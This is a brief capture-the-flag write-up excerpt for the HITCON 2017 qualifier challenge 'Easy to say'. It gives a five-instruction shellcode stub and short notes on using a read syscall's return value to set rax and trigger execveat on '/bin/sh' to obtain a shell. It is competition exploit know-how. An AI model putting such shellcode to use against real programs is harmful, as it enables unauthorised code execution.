[https://github.com/ssspeedgit00/CTF/tree/master/2017/HITCON_2017_quals/Re_Easy_to_say](https://github.com/ssspeedgit00/CTF/tree/master/2017/HITCON_2017_quals/Re_Easy_to_say)

```asm
push rsp
pop rsi
xor edx,esp
syscall
jne 0xfffffffffffffffc
```
* Use return value of `read` to control `rax`.
* rdx = edx ^ esp ^ esp = 0
* Trigger `execveat( 0 , "/bin/sh" , 0 , 0 )`, see the detials in the exploit code.

Original writeup (https://github.com/ssspeedgit00/CTF/tree/master/2017/HITCON_2017_quals/Re_Easy_to_say).